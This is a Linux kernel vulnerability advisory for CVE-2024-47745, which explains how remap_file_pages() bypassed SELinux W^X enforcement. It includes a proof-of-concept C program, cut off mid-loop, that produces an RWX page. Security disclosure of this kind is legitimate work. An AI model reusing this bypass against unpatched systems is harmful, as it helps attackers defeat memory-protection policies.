CVE-2024-47745

In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> mm: call the security_mmap_file() LSM hook in remap_file_pages()<br /> <br /> The remap_file_pages syscall handler calls do_mmap() directly, which<br /> doesn&amp;#39;t contain the LSM security check. And if the process has called<br /> personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for<br /> RW pages, this will actually result in remapping the pages to RWX,<br /> bypassing a W^X policy enforced by SELinux.<br /> <br /> So we should check prot by security_mmap_file LSM hook in the<br /> remap_file_pages syscall handler before do_mmap() is called. Otherwise, it<br /> potentially permits an attacker to bypass a W^X policy enforced by<br /> SELinux.<br /> <br /> The bypass is similar to CVE-2016-10044, which bypass the same thing via<br /> AIO and can be found in [1].<br /> <br /> The PoC:<br /> <br /> $ cat &gt; test.c<br /> <br /> int main(void) {<br /> size_t pagesz = sysconf(_SC_PAGE_SIZE);<br /> int mfd = syscall(SYS_memfd_create, "test", 0);<br /> const char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,<br /> MAP_SHARED, mfd, 0);<br /> unsigned int old = syscall(SYS_personality, 0xffffffff);<br /> syscall(SYS_personality, READ_IMPLIES_EXEC | old);<br /> syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);<br /> syscall(SYS_personality, old);<br /> // show the RWX page exists even if W^X policy is enforced<br /> int fd = open("/proc/self/maps", O_RDONLY);<br /> unsigned char buf2[1024];<br /> while (1) {<br /> int ret = read(fd, buf2, 1024);<br /> if (ret